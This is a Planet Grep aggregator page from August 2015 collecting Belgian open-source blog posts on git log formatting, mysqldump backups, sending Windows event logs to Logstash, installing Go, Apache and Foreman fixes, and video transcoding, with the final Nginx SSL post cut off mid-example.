Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

August 26, 2015

Les Jeudis du Libre

Arlon, le 3 septembre, S02E01 : la VoIP avec Asterisk

Logo AsteriskC’est bientôt la rentrée, et comme toutes les bonnes choses, les Jeudis du Libre d’Arlon reviennent pour une nouvelle saison. Pour cette première édition, nous vous proposons une présentation du logiciel Asterisk et de la VoIP.


Informations pratiques

Présentation de l’intervenant

Thierry PIERRAT a 47 ans. Il est issu d’une formation d’ingénieur technicien en Productique et matériaux nouveaux et développe des logiciels de gestion de production. Il a commencé l’informatique sur Apple 2 en 83 en programmant en assembleur. En 1994, il découvre GNU/Linux.

Il est co-fondateur de Allied Data Sys. SA (ADS), avec Pascal BELLARD en 2003. L’objectif étant de réaliser des solutions de Téléphonie IP basées au départ sur le projet Bayonne / CT server puis sur Asterisk. Aujourd’hui, il s’agit de proposer une solution globale packagée Open Source reposant sur GNU/SliTaz, Asterisk et Odoo pour gérer l’infrastructure informatique, téléphonique et administrative des sociétés.

Il est intervenant au niveau BAC +3 et Bac +5 pour les formations Réseau et téléphonie IP.


by Didier Villers at August 26, 2015 05:09 AM

Frank Goossens

Music from Our Tube: new Floating Points track!

Floating Points just released this on his YouTube channel;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at August 26, 2015 04:20 AM

August 25, 2015

Mattias Geniar

Pretty git log in one line

The post Pretty git log in one line appeared first on

If you type git log to see the commit history in a git repository, the standard output isn't very terminal-friendly. It's a lot of text, with very little information displayed on your screen. You can, however, change the output of your git log to be more condensed and show more output on the same screen size.

By default, a git log looks like this.

$ git log

commit 3396763626316124388f76be662bd941df591118
Author: Mattias Geniar 
Date:   Fri Aug 21 09:16:26 2015 +0200

    Add twitter link

commit c73bbc98b5f55e5a4dbfee8e0297e4e1652a0687
Author: Mattias Geniar 
Date:   Wed Aug 19 09:19:37 2015 +0200

    add facebook link

Each commit, with the date and author + the commit message. But boy, it takes up a lot of screen space.

A simple fix is to pass the --pretty=oneline parameter, which makes it all fit on a single line.

$ git log --pretty=oneline

3396763626316124388f76be662bd941df591118 Add twitter link
c73bbc98b5f55e5a4dbfee8e0297e4e1652a0687 add facebook link

It's taking up less space, but missing crucial information like the date of the commit.

There are longer versions of that same --pretty parameter. In fact, it allows you to specify all the fields you want in the output.

$ git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit

* 3396763 - (HEAD, origin/master, master) Add twitter link (4 days ago) 
* c73bbc9 - add facebook link (6 days ago) 
* cb555df - More random values (6 days ago) 
*   60e7bbf - Merge pull request #1 from TSchuermans/patch-1 (7 days ago) 
| * 8044a8f - Typo fix (7 days ago) 

The output is indented to show branch-points and merges. In colour, it looks like this.


To make life easier, you can can add a git alias so you don't have to remember the entire syntax.

$ git config --global alias.logline "log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit"
$ git logline

More data on the same screen real estate!

The post Pretty git log in one line appeared first on

by Mattias Geniar at August 25, 2015 07:00 PM

Dries Buytaert

Digital Distributors vs Open Web: who will win?

I've spent a fair amount of time thinking about how to win back the Open Web, but in the case of digital distributors (e.g. closed aggregators like Facebook, Google, Apple, Amazon, Flipboard) superior, push-based user experiences have won the hearts and minds of end users, and enabled them to attract and retain audience in ways that individual publishers on the Open Web currently can't.

In today's world, there is a clear role for both digital distributors and Open Web publishers. Each needs the other to thrive. The Open Web provides distributors content to aggregate, curate and deliver to its users, and distributors provide the Open Web reach in return. The user benefits from this symbiosis, because it's easier to discover relevant content.

As I see it, there are two important observations. First, digital distributors have out-innovated the Open Web in terms of conveniently delivering relevant content; the usability gap between these closed distributors and the Open Web is wide, and won't be overcome without a new disruptive technology. Second, the digital distributors haven't provided the pure profit motives for individual publishers to divest their websites and fully embrace distributors.

However, it begs some interesting questions for the future of the web. What does the rise of digital distributors mean for the Open Web? If distributors become successful in enabling publishers to monetize their content, is there a point at which distributors create enough value for publishers to stop having their own websites? If distributors are capturing market share because of a superior user experience, is there a future technology that could disrupt them? And the ultimate question: who will win, digital distributors or the Open Web?

I see three distinct scenarios that could play out over the next few years, which I'll explore in this post.

Digital Distributors vs Open Web: who will win?

This image summarizes different scenarios for the future of the web. Each scenario has a label in the top-left corner which I'll refer to in this blog post. A larger version of this image can be found at

Scenario 1: Digital distributors provide commercial value to publishers (A1 → A3/B3)

Digital distributors provide publishers reach, but without tangible commercial benefits, they risk being perceived as diluting or even destroying value for publishers rather than adding it. Right now, digital distributors are in early, experimental phases of enabling publishers to monetize their content. Facebook's Instant Articles currently lets publishers retain 100 percent of revenue from the ad inventory they sell. Flipboard, in efforts to stave off rivals like Apple News, has experimented with everything from publisher paywalls to native advertising as revenue models. Expect much more experimentation with different monetization models and dealmaking between the publishers and digital distributors.

If digital distributors like Facebook succeed in delivering substantial commercial value to the publisher they may fully embrace the distributor model and even divest their own websites' front-end, especially if the publishers could make the vast majority of their revenue from Facebook rather than from their own websites. I'd be interested to see someone model out a business case for that tipping point. I can imagine a future upstart media company either divesting its website completely or starting from scratch to serve content directly to distributors (and being profitable in the process). This would be unfortunate news for the Open Web and would mean that content management systems need to focus primarily on multi-channel publishing, and less on their own presentation layer.

As we have seen from other industries, decoupling production from consumption in the supply-chain can redefine industries. We also know that introduces major risks as it puts a lot of power and control in the hands of a few.

Scenario 2: The Open Web's disruptive innovation happens (A1 → C1/C2)

For the Open Web to win, the next disruptive innovation must focus on narrowing the usability gap with distributors. I've written about a concept called a Personal Information Broker (PIM) in a past post, which could serve as a way to responsibly use customer data to engineer similar personal, contextually relevant experiences on the Open Web. Think of this as unbundling Facebook where you separate the personal information management system from their content aggregation and curation platform, and make that available for everyone on the web to use. First, it would help us to close the user experience gap because you could broker your personal information with every website you visit, and every website could instantly provide you a contextual experience regardless of prior knowledge about you. Second, it would enable the creation of more distributors. I like the idea of a PIM making the era of handful of closed distributors as short as possible. In fact, it's hard to imagine the future of the web without some sort of PIM. In a future post, I'll explore in more detail why the web needs a PIM, and what it may look like.

Scenario 3: Coexistence (A1 → A2/B1/B2)

Finally, in a third combined scenario, neither publishers nor distributors dominate, and both continue to coexist. The Open Web serves as both a content hub for distributors, and successfully uses contextualization to improve the user experience on individual websites.


Right now, since distributors are out-innovating on relevance and discovery, publishers are somewhat at their mercy for traffic. However, a significant enough profit motive to divest websites completely remains to be seen. I can imagine that we'll continue in a coexistence phase for some time, since it's unreasonable to expect either the Open Web or digital distributors to fail. If we work on the next disruptive technology for the Open Web, it's possible that we can shift the pendulum in favor of “open” and narrow the usability gap that exists today. If I were to guess, I'd say that we'll see a move from A1 to B2 in the next 5 years, followed by a move from B2 to C2 over the next 5 to 10 years. Time will tell!

by Dries at August 25, 2015 12:25 PM

August 24, 2015

Mattias Geniar

MySQL Back-up: Take a mysqldump with each database in its own SQL File

The post MySQL Back-up: Take a mysqldump with each database in its own SQL File appeared first on

If's often very useful to have a couple of MySQL oneliners nearby. This guide will show you how to take a mysqldump of all databases on your server, and write each database to its own SQL file. As a bonus, I'll show you how to compress the data and import it again -- if you ever need to restore from those files.

Take a mysqldump back-up to separate files

To take a back-up, run the mysqldump tool on each available database.

$ mysql -N -e 'show databases' | while read dbname; do mysqldump --complete-insert --single-transaction "$dbname" > "$dbname".sql; done

The result is a list of all your database files, in your current working directory, suffixed with the .sql file extension.

$ ls -alh *.sql

-rw-r--r-- 1 root root  44M Aug 24 22:39 db1.sql
-rw-r--r-- 1 root root  44M Aug 24 22:39 db2.sql

If you want to write to a particular directory, like /var/dump/databases/, you can change the output of the command like this.

$ mysql -N -e 'show databases' | while read dbname; do mysqldump --complete-insert --single-transaction "$dbname" > /var/dump/databases/"$dbname".sql; done

Mysqldump each database and compress the SQL file

If you want to compress the files, as you're taking them, you can run either gzip or bzip on the resulting SQL file.

$ mysql -N -e 'show databases' | while read dbname; do mysqldump --complete-insert --single-transaction "$dbname" > "$dbname".sql; [[ $? -eq 0 ]] && gzip "$dbname".sql; done

The result is again a list of all your databases, but gzip'd to save diskspace.

$ ls -alh *.gz

-rw-r--r--  1 root root  30K Aug 24 22:42 db1.sql.gz
-rw-r--r--  1 root root 1.6K Aug 24 22:42 db1.sql.gz

This can significantly save you on diskspace at the cost of additional CPU cycles while taking the back-up.

Import files to mysql from each .SQL file

Now that you have a directory full of database files, with the database name in the SQL file, how can you import them all again?

The following for-loop will read all files, strip the ".sql" part from the filename and import to that database.

Warning: this overwrites your databases, without prompting for confirmation. Use with caution!

$ for sql in *.sql; do dbname=${sql/\.sql/}; echo -n "Now importing $dbname ... "; mysql $dbname < $sql; echo " done."; done

The output will tell you which database has been imported already.

$ for sql in *.sql; do dbname=${sql/\.sql/}; echo -n "Now importing $dbname ... "; mysql $dbname < $sql; echo " done."; done 

Now importing db1 ...  done.
Now importing db2 ...  done.

These are very simple one-liners that come in handy when you're migrating from server-to-server.

The post MySQL Back-up: Take a mysqldump with each database in its own SQL File appeared first on

by Mattias Geniar at August 24, 2015 08:52 PM

Xavier Mertens

Sending Windows Event Logs to Logstash

[The post Sending Windows Event Logs to Logstash has been first published on /dev/random]

Eventlog to LogstashThis topic is not brand new, there exists plenty of solutions to forward Windows event logs to Logstash (OSSECSnare or NXlog amongst many others). They perform a decent job to collect events on running systems but they need to deploy extra piece of software on the target operating systems. For a specific case, I was looking for a solution to quickly transfer event logs from a live system without having to install extra software.

The latest versions of the Microsoft Windows come with Powershell installed by default. Powershell is, as defined by Wikipedia, a task automation and configuration management framework. PowerShell 3 introduced nice cmdlets to convert data from/to JSON which is a format natively supported by Logstash. The goal is to have a standalone Powershell script executed from a share or a read-only USB-stick that will process Windows event logs and send them to a remote preconfigured Logstash server on a specific TCP port.

The first step is to prepare our Logstash environment to receive new events. Let’s create a new input and store received events to a dedicated index (it will be easier to investigate the collected data):

input {
    tcp {
        port => 5001
        type => 'eventlog'
        codec => json {
            charset => 'UTF-8'

filter {
    if [type == 'eventlog' {
        grok {
            match => [ 'TimeCreated', "Date\(%{NUMBER:timestamp}\)" ]
        date {
            match => [ 'timestamp', 'UNIX_MS' ]
output {
    if [type == 'eventlog' {
        elasticsearch {
            host => 'localhost'
            port => 9300
            node_name => 'forensics'
            cluster => 'forensics-cluster'
            index => 'logstash-evenlog-%{+YYYY.MM.dd}'

The Powershell script collects event logs via the cmdled Get-WinEvent and convert them in JSON format with ConvertTo-Json. The fact that Logstash expects one event per line, data received by Get-WinEvent are converted to an array and processed in a loop. Before sending the event via a TCP session, ‘\r’ and ‘\n’ are removed. Edit the script, change the destination IP/port and just execute the script to send a copy of all the event logs to your Logstash (take care, it could overload your server). A few minutes later (depending on the amount of data to index), you’ll be able to investigate the events from your favourite Kibana session:

Events in Logstash

(Click to enlarge)

Some remarks:

The script is available in my repository.

[The post Sending Windows Event Logs to Logstash has been first published on /dev/random]

by Xavier at August 24, 2015 12:30 PM

Les Jeudis du Libre

Mons, le 24 septembre – Le logiciel libre pour favoriser l’interopérabilité en milieu hospitalier : l’exemple d’Orthanc en imagerie médicale

Logo de OrthancCe jeudi 24 septembre 2015 à 19h se déroulera la 41ème séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : Le logiciel libre pour favoriser l’interopérabilité en milieu hospitalier : l’exemple d’Orthanc en imagerie médicale

Thématique : Santé

Public : Tout public

L’animateur conférencier : Sébastien Jodogne (Orthanc & CHU Liège)

N.B. : Sébastien Jodogne, le logiciel Orthanc et le CHU de Liège ont été récompensés cette année :

Lieu de cette séance : CHU Ambroise Paré, Auditoire Leburton. Boulevard Kennedy 2 à 7000 Mons. Cf. accès et sur la carte OSM.

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page La séance sera suivie d’un verre de l’amitié.

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid et Creative Monkeys.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires montoises impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : Au cours des vingt dernières années, l’essor puis la démocratisation des nouvelles technologies d’imagerie médicale ont mené à de profondes révolutions dans la prise en charge clinique de nombreuses pathologies, comme le cancer ou l’insuffisance cardiaque. Le volume sans cesse croissant d’images auquel tout hôpital est actuellement confronté n’est pas sans créer de nombreuses difficultés informatiques : acheminement automatique des images depuis les dispositifs d’acquisition jusque dans les logiciels d’analyse d’images, échanges inter- et extra-hospitaliers, anonymisation des données…

Face à ces besoins impérieux de la collectivité et face au manque d’offres commerciales adaptées, le Département de Physique Médicale du CHU de Liège a décidé de concevoir un produit informatique innovant et de qualité industrielle. Ce logiciel, nommé Orthanc, est un serveur d’imagerie médicale léger, robuste et versatile. Orthanc a la particularité d’être un logiciel libre : tous les hôpitaux du monde peuvent donc l’utiliser librement, selon une démarche universitaire, collaborative et ouverte.

L’exemple d’Orthanc montre que le logiciel libre permet d’amener une meilleure indépendance technologique des services médicaux face à leurs fournisseurs. De manière plus générale, les standards ouverts du domaine de la santé (tels que FHIR et DICOM) et leurs implémentations libres de référence sont des outils essentiels pour créer une interopérabilité maximale entre écosystèmes propriétaires dans le milieu médical, au bénéfice de notre système de soins de santé. En outre, bénéficier d’une telle interopérabilité est une énorme opportunité pour stimuler notre tissu industriel en santé électronique, ainsi que pour garantir les libertés numériques des patients.

by Didier Villers at August 24, 2015 07:55 AM

August 23, 2015

Mattias Geniar

Install Go 1.5 On CentOS 6 and 7

The post Install Go 1.5 On CentOS 6 and 7 appeared first on

This is a really quick guide on how to install the recently released Go 1.5 on a CentOS 6 or 7 server.

Start by grabbing the latest 1.5 release from the download pages.

$ cd /tmp
$ wget

Extract the binary files to /usr/local/go.

$ tar -C /usr/local -xzf /tmp/go1.5.linux-amd64.tar.gz

For easy access, symlink your installed binaries in /usr/local/go to /use/local/bin, which should be in your default $PATH in your shell.

$ echo $PATH

$ ln -s /usr/local/go/bin/go /usr/local/bin/go
$ ln -s /usr/local/go/bin/godoc /usr/local/bin/godoc
$ ln -s /usr/local/go/bin/gofmt /usr/local/bin/gofmt

Alternatively, add the /usr/local/go/bin directory to your $PATH. Add the following line to your ~/.profile file.

export PATH=$PATH:/usr/local/go/bin

You now have the working go binary for version 1.5

$ go version
go version go1.5 linux/amd64

The post Install Go 1.5 On CentOS 6 and 7 appeared first on

by Mattias Geniar at August 23, 2015 08:29 PM

August 21, 2015

Mattias Geniar

Foreman 1.9: ERROR: column hosts.last_freshcheck does not exist

The post Foreman 1.9: ERROR: column hosts.last_freshcheck does not exist appeared first on

If you've recently upgraded your Foreman 1.8 setup to 1.9, you may see the following error in your dashboard when navigating to a particular host.

# Oops, we're sorry but something went wrong

PGError: ERROR: column hosts.last_freshcheck does not exist LINE 1: ..."name" AS t1_r1, "hosts"."last_compile" AS t1_r2, "hosts"."l... ^ : SELECT "reports"."id" AS t0_r0, "reports"."host_id" AS t0_r1, "reports"."reported_at" AS t0_r2, ...

The upgrade steps will tell you to execute the following database migrations:

$ cd /usr/share/foreman
$ foreman-rake db:migrate
$ foreman-rake db:seed

You can check if the migrations were all executed correctly, by running the following command.

$ cd /usr/share/foreman
$ foreman-rake db:migrate:status
   up     20150618093433  Remove unused fields from hosts
   up     20150622090115  Change reported at
   up     20150714140850  Remove new from compute attributes

If the output shows "up", it means that particular database migration script is up-to-date and was executed. Nothing to do here.

The error concerning the hosts.last_freshcheck column is a result of a cleanup issue where obsoleted columns have been removed. The resulting code is found in pull request 2471.

If your database migrations are all completed and you still see the error, restart your Apache server. The Ruby/Passengers processes keep a cache in memory of the database structure, that isn't refreshed when running the foreman-rake db:migrate commands.

The post Foreman 1.9: ERROR: column hosts.last_freshcheck does not exist appeared first on

by Mattias Geniar at August 21, 2015 06:00 PM

Frank Goossens

Music from Our Tube, but not suited for my 9yo daughter

Don’t know where she got it from, but these last few weeks my daughter regularly chants “danger danger” to which I started replying “high voltage”.  We both laugh each time, fun times! But she’s only 9, so I decided not to show her Electric Six‘s song from which I got that reply on YouTube just yet.

You, on the other hand, are older and I hope you’re not that easily shocked (consider this a kind warning);

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at August 21, 2015 05:13 AM

August 19, 2015

Frank Goossens

It feels great to see ones children going places!


by frank at August 19, 2015 04:26 AM

August 17, 2015

Mattias Geniar

Apache 2.4: Unknown Authz provider: ip

The post Apache 2.4: Unknown Authz provider: ip appeared first on

An Apache 2.4 server with a few missing modules can show the following error in your logs.

[core:alert] [pid 1234] [client] /var/www/vhosts/site.tld/htdocs/.htaccess: Unknown Authz provider: ip, referer:

It's this kind of config that triggers it, either in your vhost configurations or in your .htaccess files.

<IfModule mod_authz_core.c>
		Require all granted
		Require not ip

The idea is to use IP addresses as a means of allowing/blocking access to a particular vhost.

In order for this to work, you have to load the "host" module in Apache 2.4.

To fix this, add the following in your general httpd.conf file.

$ cat /etc/http/conf/httpd.conf
LoadModule authz_host_module modules/

Reload your Apache and access control based on IP will work again.

The post Apache 2.4: Unknown Authz provider: ip appeared first on

by Mattias Geniar at August 17, 2015 02:37 PM

August 16, 2015

Claudio Ramirez

MS Office 365 (Click-to-Run): Remove unused applications

Too many MS Office 365 appsIf you install Microsoft Office trough click-to-run you’ll end with the full suite installed. You can no longer select what application you want to install. That’s kind of OK because you pay for the complete suit. Or at least the organisation (school, work, etc.) offering the subscription does. But maybe you are like me and you dislike installing applications you don’t use. Or even more like me: you’re a Linux user with a Windows VM you boot once in a while out of necessity. And unused applications in a VM residing on your disk is *really* annoying.

The Microsoft documentation to remove the unused applications (Access as a DB? Yeah, right…) wasn’t very straightforward so I post what worked for me after the needed trial-and-error routines. This is a small howto:

    • Install the Office Deployment Toolkit (download). The installer asks for a installation location. I put it in C:\Users\<me>\OfficeDeployTool (<me> is my username, change accordingly).
    • Create a configuration.xml with the applications you want to delete. The file should reside in the directory you chose for the Office Deployment Tookit (e.g. C:\Users\<me>\OfficeDeployTool\configuration.xml) or you should refer to the file with its full path name. If you run the 64-bit Office version change OfficeClientEdition="32" to OfficeClientEdition="64".
      You can find the full list op AppIDs here. Add or remove ExcludeApps as desired. The content of the file in my case was like follows:
      <Add SourcePath="C:\Users\<me>\OfficeDeployTool" OfficeClientEdition="32">
      <Product ID="O365ProPlusRetail">
      <Property Name="FORCEAPPSHUTDOWN" Value="TRUE" />
      <Language ID="en-us" />
      <ExcludeApp ID="Access" />
      <ExcludeApp ID="Groove" />
      <ExcludeApp ID="InfoPath" />
      <ExcludeApp ID="Lync" />
      <ExcludeApp ID="OneNote" />
      <ExcludeApp ID="Outlook" />
      <ExcludeApp ID="Project" />
      <ExcludeApp ID="Publisher" />
      <ExcludeApp ID="SharePointDesigner" />
      <Updates Enabled="TRUE"/>
      <Display Level="None" AcceptEULA="TRUE" />
      <!-- <Property Name="AUTOACTIVATE" Value="1" /> -->
    • Download the office components. Type in a cmd box:
      C:\Users\<me>\OfficeDeployTool>setup.exe /download configuration.xml
    • Remove the unwanted applications:
      C:\Users\<me>\OfficeDeployTool>setup.exe /configure configuration.xml
    • Delete (if you want) the Office Deployment Toolkit directory (that includes the downloaded office components)

Enjoy the space (if you are using a VM don’t forget to defragment and compact the Virtual Hard Disk to reclaim the space) and the faster updates.

Filed under: Uncategorized Tagged: Click-to-Run, MS Office 365, VirtualBox, vm, VMWare, Windows

by claudio at August 16, 2015 07:07 PM

Frank Goossens

No Google fonts with NoScript

I’m not only into optimizing the speed of sites with for the benefit of their visitors, but also into speeding up all sites in my browser, to satisfy my own impatience. I already blocked Facebook, Twitter and Google+ widgets using NoScript’s ABE and now added this little snippet in ABE’s user ruleset to stop Google Fonts from being loaded;

# no google fonts

Result: less requests, less to download and faster rendering without that ugly FOUT. Because let’s face it, your fancy fonts slow down the web and they are of no interest to me.

by frank at August 16, 2015 09:14 AM

Dag Wieers

Try this if you fail to (re)install Google Picasa on Windows

Today I lost quite some time figuring out why Google Picasa did not work correctly. Even though the latest version *was* installed already it proposed to download and install an update.

So the recommended way to fix Picasa issues is to uninstall and reinstall. Unfortunately the uninstall went fine, but it wouldn't reinstall. Even when every possible Picasa directory was (temporarily for the sake of hypothesis) removed. To no avail.

On Linux I would strace/ltrace the process in order to see what's going on. On Windows you have a Sysinternals tool named procmon.exe. It can trace similar things, like file accesses and registry manipulations. At first sight nothing seemed to be wrong, but looking closer I noticed it was successfully accessing key \HLM\SOFTWARE\Wow6432Node\Google\Picasa\Installed Version which contained the version of Google Picasa that was actually removed from the system. Weird !

After removing the whole \HLM\SOFTWARE\Wow6432Node\Google\Picasa tree, the picasa39-setup.exe installer worked correctly again and Picasa installed fine afterwards.

I hope this is useful to someone so that the time I lost is somehow not completely wasted... Sigh...

by dag at August 16, 2015 12:14 AM

August 14, 2015

Wouter Verhelst

Multi-pass transcoding to WebM with normalisation

Transcoding video from one format to another seems to be a bit of a black art. There are many tools that allow doing this kind of stuff, but one issue that most seem to have is that they're not very well documented.

I ran against this a few years ago, when I was first doing video work for FOSDEM and did not yet have proper tools to do the review and transcoding workflow.

At the time, I just used mplayer to look at the .dv files, and wrote a text file with a simple structure to remember exactly what to do with it. That file was then fed to a perl script which wrote out a shell script that would use the avconv command to combine and extract the "interesting" data from the source DV files into a single DV file per talk, and which would then call a shell script which used gst-launch and sox to do a multi-pass transcode of those intermediate DV files into a WebM file.

While all that worked properly, it was a rather ugly hack, never cleaned up, and therefore I never really documented it properly either. Recently, however, someone asked me to do so anyway, so here goes. Before you want to complain about how this ate the videos of your firstborn child, however, note the above.

The perl script spent a somewhat large amount of code reading out the text file and parsing it into an array of hashes. I'm not going to reproduce that, since the actual format of the file isn't all that important anyway. However, here's the interesting bits:

foreach my $pfile(keys %parts) {
        my @files = @{$parts{$pfile}};

        say "#" x (length($pfile) + 4);
        say "# " . $pfile . " #";
        say "#" x (length($pfile) + 4);
        foreach my $file(@files) {
                my $start = "";
                my $stop = "";

                if(defined($file->{start})) {
                        $start = "-ss " . $file->{start};
                if(defined($file->{stop})) {
                        $stop = "-t " . $file->{stop};
                if(defined($file->{start}) && defined($file->{stop})) {
                        my @itime = split /:/, $file->{start};
                        my @otime = split /:/, $file->{stop};
                        if($otime[1]<0) {
                        if($otime[2]<0) {
                        $stop = "-t " . $otime[0] . ":" . $otime[1] .  ":" . $otime[2];
                if(defined($file->{start}) || defined($file->{stop})) {
                        say "ln " . $file->{name} . ".dv part-pre.dv";
                        say "avconv -i part-pre.dv $start $stop -y -acodec copy -vcodec copy part.dv";
                        say "rm -f part-pre.dv";
                } else {
                        say "ln " . $file->{name} . ".dv part.dv";
                say "cat part.dv >> /tmp/" . $pfile . ".dv";
                say "rm -f part.dv";
        say "dv2webm /tmp/" . $pfile . ".dv";
        say "rm -f /tmp/" . $pfile . ".dv";
        say "scp /tmp/" . $pfile . ".webm$uploadpath || true";
        say "mv /tmp/" . $pfile . ".webm .";

That script uses avconv to read one or more .dv files and transcode them into a single .dv file with all the start- or end-junk removed. It uses /tmp rather than the working directory, since the working directory was somewhere on the network, and if you're going to write several gigabytes of data to an intermediate file, it's usually a good idea to write them to a local filesystem rather than to a networked one.

Pretty boring.

It finally calls dv2webm on the resulting .dv file. That script looks like this:


set -e

newfile=$(basename $1 .dv).webm
wavfile=$(basename $1 .dv).wav
wavfile=$(readlink -f $wavfile)
normalfile=$(basename $1 .dv)-normal.wav
normalfile=$(readlink -f $normalfile)
oldfile=$(readlink -f $1)

echo -e "\033]0;Pass 1: $newfile\007"
gst-launch-0.10 webmmux name=mux ! fakesink \
  uridecodebin uri=file://$oldfile name=demux \
  demux. ! ffmpegcolorspace ! deinterlace ! vp8enc multipass-cache-file=/tmp/vp8-multipass multipass-mode=1 threads=2 ! queue ! mux.video_0 \
  demux. ! progressreport ! audioconvert ! audiorate ! tee name=t ! queue ! vorbisenc ! queue ! mux.audio_0 \
  t. ! queue ! wavenc ! filesink location=$wavfile
echo -e "\033]0;Audio normalize: $newfile\007"
sox --norm $wavfile $normalfile
echo -e "\033]0;Pass 2: $newfile\007"
gst-launch-0.10 webmmux name=mux ! filesink location=$newfile \
  uridecodebin uri=file://$oldfile name=video \
  uridecodebin uri=file://$normalfile name=audio \
  video. ! ffmpegcolorspace ! deinterlace ! vp8enc multipass-cache-file=/tmp/vp8-multipass multipass-mode=2 threads=2 ! queue ! mux.video_0 \
  audio. ! progressreport ! audioconvert ! audiorate ! vorbisenc ! queue ! mux.audio_0

rm $wavfile $normalfile

... and is a bit more involved.

Multi-pass encoding of video means that we ask the encoder to first encode the file but store some statistics into a temporary file (/tmp/vp8-multipass, in our script), which the second pass can then reuse to optimize the transcoding. Since DV uses different ways of encoding things than does VP8, we also need to do a color space conversion (ffmpegcolorspace) and deinterlacing (deinterlace), but beyond that the video line in the first gstreamer pipeline isn't very complicated.

Since we're going over the file anyway and we need the audio data for sox, we add a tee plugin at an appropriate place in the audio line in the first gstreamer pipeline, so that we can later on pick up that same audio data an write it to a wav file containing linear PCM data. Beyond the tee, we go on and do a vorbis encoding, as is needed for the WebM format. This is not actually required for a first pass, but ah well. There's some more conversion plugins in the pipeline (specifically, audioconvert and audiorate), but those are not very important.

We next run sox --norm on the .wav file, which does a fully automated audio normalisation on the input. Audio normalisation is the process of adjusting volume levels so that the audio is not too loud, but also not too quiet. Sox has pretty good support for this; the default settings of its --norm parameter make it adjust the volume levels so that the highest peak will just about reach the highest value that the output format can express. As such, you have no clipping anywhere in the file, but also have an audio level that is actually useful.

Next, we run a second-pass encoding on the input file. This second pass uses the statistics gathered in the first pass to decide where to put its I- and P-frames so that they are placed at the most optimal position. In addition, rather than reading the audio from the original file, we now read the audio from the .wav file containing the normalized audio which we produced with sox, ensuring the audio can be understood.

Finally, we remove the intermediate audio files we created; and the shell script which was generated by perl also contained an rm command for the intermediate .dv file.

Some of this is pretty horrid, and I never managed to clean it up enough so it would be pretty (and now is not really the time). However, it Just Works(tm), and I am happy to report that it continues to work with gstreamer 1.0, provided you replace the ffmpegcolorspace by an equally simple videoconvert, which performs what ffmpegcolorspace used to perform in gstreamer 0.10.

August 14, 2015 07:33 PM

Ruben Vermeersch

Custom attributes in angular-gettext

Kristiyan Kostadinov recently submitted a very neat new feature for angular-gettext, which was just merged: support for custom attributes.

This feature allows you to mark additional attributes for extraction. This is very handy if you’re always adding translations for the same attributes over and over again.

For example, if you’re always doing this:

<input placeholder="{{ 'Input something here' | translate }}">

You can now mark placeholder as a translatable attribute. You’ll need to define your own directive to do the actual translation (an example is given in the documentation), but it’s now a one-line change in the options to make sure that placeholder gets recognized and hooked into the whole translation string cycle.

Your markup will then become:

<input placeholder="Input something here">

And it’ll still internationalize nicely. Sweet!

You can get this feature by updating your grunt-angular-gettext dependency to at least 2.1.3.

Full usage instructions can be found in the developer guide.

Comments | More on | @rubenv on Twitter

August 14, 2015 08:15 AM

August 13, 2015

Mattias Geniar

iPhone’s “Field Test” debug screen: Dial *3001#12345#* for the real signal strength

The post iPhone’s “Field Test” debug screen: Dial *3001#12345#* for the real signal strength appeared first on

I didn't know it was a thing, but apparently the iPhone has a "Field Test" hidden menu you can use to see all kind of diagnostics about your cell reception, including the actual signal strength compared in dB, instead of just the 5 dots that average things out.

This is what is usually looks like on your iPhone.


The upper left corner shows you the signal strength expressed in dots. It's a simple scale from 1 to 5. But like any technically savvy person can tell you, in reality there are many more stages of cell reception.

Your iPhone has a way of exposing that data for you, if you know how.

Start by dialling a special number: *3001#12345#*. The number includes the hashes and asterisks.


Hit dial and watch the field test pop up. You'll immediately notice that the upper left corner stopped showing dots and started to show an actual number: the cell reception, expressed in dB.

The lower the number, the better your signal will be. For instance, -51 is a full signal, -105 is no signal. Anything in between is average. For more details on how cell reception works, I kindly refer you to WikiPedia.


If you tab the upper left corner, you can toggle between dots and dB view.

In the popup menu you've got some more debug info too, it's pretty fun to poke around and see some of the internals of your cell reception --- data that's usually kept hidden.


To quit, just hit the home button and everything will return to normal. To my knowledge, there's no way to have the dB view on full-time, only in the debug screen.

The post iPhone’s “Field Test” debug screen: Dial *3001#12345#* for the real signal strength appeared first on

by Mattias Geniar at August 13, 2015 07:48 PM

Nginx SSL Certificate Errors: PEM_read_bio_X509_AUX, PEM_read_bio_X509, SSL_CTX_use_PrivateKey_file

The post Nginx SSL Certificate Errors: PEM_read_bio_X509_AUX, PEM_read_bio_X509, SSL_CTX_use_PrivateKey_file appeared first on

When configuring your SSL certificates on Nginx, it's not uncommon to see several errors when you try to reload your Nginx configuration, to activate the SSL Certificates.

This post describes the following type of errors:

Read on for more details.

Nginx PEM_read_bio_X509: ASN1_CHECK_TLEN:wrong tag error

These kind of errors pop up when your certificate file isn't valid. The entire error looks like this.

$ service nginx restart

